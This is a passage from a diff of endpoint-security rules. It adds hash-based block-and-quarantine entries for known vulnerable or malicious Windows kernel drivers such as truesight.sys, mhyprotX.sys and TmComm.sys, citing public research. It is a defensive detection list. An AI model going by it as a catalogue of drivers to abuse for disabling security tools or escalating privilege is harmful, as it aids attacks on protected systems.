+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974995Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "03192bacd96989bad4181609295764f61a86d2ec9f7918a90a219e674ae3097f",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1418c62-fdfb-5179-b107-4a6e52f30ef9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143968Z",
+ "creation_date": "2026-03-23T11:45:31.143970Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143976Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e3c2f47cd5f0ba9e70449ce7339e231be97b45a02ddcf8859018a84064faaeed",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b146bea5-8e10-56eb-bc6c-4950767b5879",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612092Z",
+ "creation_date": "2026-03-23T11:45:29.612094Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612099Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "000e984d3eebc54259a24a17745eed07d9c3658b86462cb5ebc26381302f7a38",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b14a166f-e52a-5f66-ae5b-255f335ba1d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488063Z",
+ "creation_date": "2026-03-23T11:45:31.488065Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488070Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9e677f9f681130a8cfa94ec0ff17120ba647ac6d323912d4eed10223ef9f21f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b14b4e59-bd7f-51b4-9ec6-93d1f6e7b2b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157187Z",
+ "creation_date": "2026-03-23T11:45:31.157189Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157195Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "49ab087361a9c59829f14b1bc9a49fb0de55649cea0564f6a27c099b4ee7338a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1585483-b5f7-5c9a-b761-140acbe61751",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614438Z",
+ "creation_date": "2026-03-23T11:45:29.614440Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614445Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2bbe65cbec3bb069e92233924f7ee1f95ffa16173fceb932c34f68d862781250",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b15875cd-ac0f-507c-b1a3-785c4a715445",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828329Z",
+ "creation_date": "2026-03-23T11:45:30.828331Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828336Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1528dc51550159f8e11866fa29b36383f49905bc84bcd0ff07260d35475d0d37",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b15b0f30-b42f-5c06-9aa6-2bc3abfd2f36",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613260Z",
+ "creation_date": "2026-03-23T11:45:29.613262Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613267Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f40435488389b4fb3b945ca21a8325a51e1b5f80f045ab019748d0ec66056a8b",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1631c72-c97a-5a87-996c-709053138d1f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150704Z",
+ "creation_date": "2026-03-23T11:45:31.150706Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150711Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "962d1a1d3316212a0f66ce825c4737d41f59c2e0743be36c3e1308f0bb7939a0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b16f0a41-7402-5aa2-9fa3-c4989ea520b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146528Z",
+ "creation_date": "2026-03-23T11:45:32.146530Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146536Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab811ca59a8a8e92fff3eca9d359a8ed5482e781c97e63dbece046d929d0a79c",
+ "comment": "Malicious Kernel Driver (aka driver_ab811ca5.sys) [https://www.loldrivers.io/drivers/09d2e61d-e041-4ec8-ab7b-385848456a36/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b16f5f6f-b1ca-57f6-9eb8-3d6311488e34",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150824Z",
+ "creation_date": "2026-03-23T11:45:31.150826Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150831Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de4cd4aa2021854e1bca582ec7a51562ab458bfd12a4b2930f85fa53d1e09915",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b173616e-abe7-5e26-ac44-efc7194f46e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149120Z",
+ "creation_date": "2026-03-23T11:45:31.149123Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149132Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "916ef806f5e08f7e5c882bd4efca3503e5e8131bb32493f8d618959eab054c78",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b191a678-ede1-5633-95a9-6688e61e93a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605806Z",
+ "creation_date": "2026-03-23T11:45:29.605808Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605815Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd7c706caa4063ce243d2c4b7e5f32418d1ad3700692ce63618b3911981573d1",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b19c9ceb-6679-515b-a8b8-5ca43e46c102",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606795Z",
+ "creation_date": "2026-03-23T11:45:29.606797Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606803Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d28acafeb6a85294d2672fa894a2934599713aa9ce1b21184dc1ec34131af7bb",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1a17760-5e85-57fe-82b5-6675cc5d7ed0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493821Z",
+ "creation_date": "2026-03-23T11:45:31.493825Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493834Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f2c74d551604daac486eb93d4513c650842e4d7f34801038ba146d76df7100a8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1a3ce7e-9e2a-55c6-a75b-8a11998d69bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829593Z",
+ "creation_date": "2026-03-23T11:45:31.829595Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829600Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "729d3ba336cb62d60a7581db4e98c93f1204563f5a63fc53950f09081a44bb55",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1ad2ae4-408d-5761-ada2-3058f26d6737",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823719Z",
+ "creation_date": "2026-03-23T11:45:30.823721Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823727Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de3c01dda0a23c1d12823848e9d79bc5b3fbc349e840dce7659d06bd898ada65",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1b20f2a-8649-5dda-88ad-ab239298af43",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153989Z",
+ "creation_date": "2026-03-23T11:45:31.153991Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153996Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d3a8e0bd46ef4bf0787a0a4719908d7ac5cae5cafb313dc3b304be18e13b9369",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1b7dc49-0701-51cd-9cce-2cff73228f8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455220Z",
+ "creation_date": "2026-03-23T11:45:30.455223Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455231Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f1772bdf7dd81cb00d30159d19d4eb9160b54d7609b36f781d08ca3afbd29a7",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1c6d3f0-1e3b-52b8-a923-8876feea9882",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495456Z",
+ "creation_date": "2026-03-23T11:45:31.495458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495463Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7d4fdd1092fd1a642f2c23b49e7c42c7c0a5c28849e28ecb58b0242fbf76e8b7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1cfffdf-163d-5c8f-ac3c-8702d84413a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604224Z",
+ "creation_date": "2026-03-23T11:45:29.604226Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604232Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "55f736e288a101c08b7245ccafe158f5a2e6f0a581f49a87d24e5cbbde8961e1",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1d5e065-6e1b-5e01-accb-967041eee440",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472693Z",
+ "creation_date": "2026-03-23T11:45:31.472697Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472704Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c880d0eacf7a11fb922b63b7f23e2ad484caba4dc566c2b050470a2880cc1929",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1e47a45-311c-5f58-8a33-97df3c6a36cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830150Z",
+ "creation_date": "2026-03-23T11:45:30.830152Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
